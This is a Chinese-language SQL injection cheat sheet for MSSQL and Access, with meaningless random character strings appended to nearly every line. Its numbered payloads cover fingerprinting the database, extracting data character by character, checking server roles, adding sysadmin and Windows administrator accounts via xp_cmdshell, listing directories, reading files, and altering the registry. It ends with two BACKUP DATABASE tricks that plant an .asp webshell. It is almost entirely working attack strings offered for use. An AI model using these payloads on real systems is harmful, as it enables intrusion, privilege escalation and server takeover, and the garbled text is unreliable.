1.判断是否有注入;and 1=1 ;and 1=2 y`a]##1j$M
2.初步判断是否是mssql ;and user>0 |-`-zo4z
j2s{rQQ
3.注入参数是字符'and [查询条件] and ''=' eOZ"kw"uHu
\pVNJy$`<
4.搜索时没过滤参数的'and [查询条件] and '%25'=' f0 "_ {\
K;*B$2Z#k
5.判断数据库系统
[7Liken
go?}M]c%7
;and (select count(*) from sysobjects)>0 mssql NeR1}W
N)
'|l0x0
;and (select count(*) from msysobjects)>0 access b8&z~'ieR
?/}-&A"
_rz7)%Y'#$
Odr<fvV,>
6.猜数据库 ;and (select Count(*) from [数据库名])>0 8+Abw)]s
46D_K
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 =)f5JwZPG
6r)B|~,OA
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 yX%NFXD
Oid;s!-S 6
9.(1)猜字段的ascii值(access) O
#5`mo
r#NR3_@9
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 sI`oz|$
j>A=Wa7
(2)猜字段的ascii值(mssql) |Ge!;v
?*:BgaR_
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 +6s6QeNS8
F7\nG}#s
10.测试权限结构(mssql) r#B{j$Rw
juEH$7N!
C}]143a/Q
gg@Ew4L&
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- I[KAW"
eE" *c>I
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 2`A\'SM'4
AA5UOg\jI
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Bpp(5
WDF6.i ?
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ]F
srk
Q*8efzgs|
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Ws:+P~8
7T?T0x3>
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- MCTTm^8O
?OC&=}
;and 1=(select IS_MEMBER('db_owner'));-- d RHw]!.
mw*KLMo42
?i$MinK
@=qWwt4~
11.添加mssql和系统的帐户 K~A@>~vFb
+r$VrNVs
;exec master.dbo.sp_addlogin username;-- /2Bf6
;exec master.dbo.sp_password null,username,password;-- [Q[ac 6f
rTzXRMv@o
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- QeQxz1
z'}z4^35,
;exec master.dbo.xp_cmdshell 'net user username password @+hO,WXN
]u47]L#
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- &/$3>MD2`
.NMZHK?%
;exec master.dbo.xp_cmdshell 'net user username password /add';-- TRFza}4:i
KSO%89R'
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- u_.Ig|Va
S7B?[SPrN[
v*^'|QyM7
qv8B$}F U
12.(1)遍历目录 LRPdA "Z
B6U4>ZN
;create table dirs(paths varchar(100), id int) Q#pgl
J :l%
;insert dirs exec master.dbo.xp_dirtree 'c:\' IYe ,VL
scyv]5Hm!
;and (select top 1 paths from dirs)>0 !_?#f|
6t'vzcQs
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) R]NCD*~
KP CZiu7
%Vhj<gN
Thuwme
(2)遍历目录 9G)fJr[c
xpWY4Q
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- &G_XgQsg{
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 e|4U2\&3y
G!U
`8R
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 M<xF4L3]
'h>CgR^NM1
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 m'U>=<!D
m]&y&oz
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 \;0UP+
|fPR7-
7*@BCu6
O7yIFqI=/
13.mssql中的存储过程 ^\w!D{Y7Q
e84O
6K6o
xp_regenumvalues 注册表根键, 子键 "T.Qb/97@
\1?:
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 @|fT%Rwho<
Nx<fj=VJ
xp_regread 根键,子键,键值名 43Ua@KNi
PDpDkcy|QM
;exec xp_regread JxQGL{)
>
)odz/\9n3c
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 s[}cj+0
;&
zBNj
xp_regwrite 根键,子键, 值名, 值类型, 值 ?;DzWCL~9
hz rS_v
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 l:j>d^V*&x
B1 xlWdm
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ?'^yw C`
)pw53,7>aN
xp_regdeletevalue 根键,子键,值名 ?,
cI!c`
2Jqr"|sw
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 u=ZZ;%Rvd
~;I'.TW
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 8xYeaK
E]ZIm
]?s^{
s:^Xtox/
14.mssql的backup创建webshell MG4(,"c!
6eW9+5oL
use model Zi.w+V
[~k!wipK
create table cmd(str image); C0;:")6~
BHDd^bd
insert into cmd(str) values (''); =]P|!$!}0
qKNHhXi
backup database model to disk='c:\l.asp'; S=3 H.D!f
._(5; PB"
"*N]Y^6/A
6QNO#!;
15.mssql内置函数 sLW e \o
_q`f5*Z[
;and (select @@version)>0 获得Windows的版本号 k];fQ7}m<0
(ljoD[kZ
;and user_name()='dbo' 判断当前系统的连接用户是不是sa e4-7&8N+
@"0n8y
;and (select user_name())>0 爆当前系统的连接用户 D"X`qF6U7
e.]k4K
;and (select db_name())>0 得到当前连接的数据库 :YNXS;>)!
:@J.!dokF
.p-T >
[W=6NAd
16.简洁的webshell cTLW}4m%g
La\|Bwx
use model td|O #R
XO}v8nWV
create table cmd(str image); bP{uZnOM2P
~4M?[E&
insert into cmd(str) values (''); z`Xc] cPi
_OJ19 Ry
backup database model to disk='g:\wwwtest\l.asp';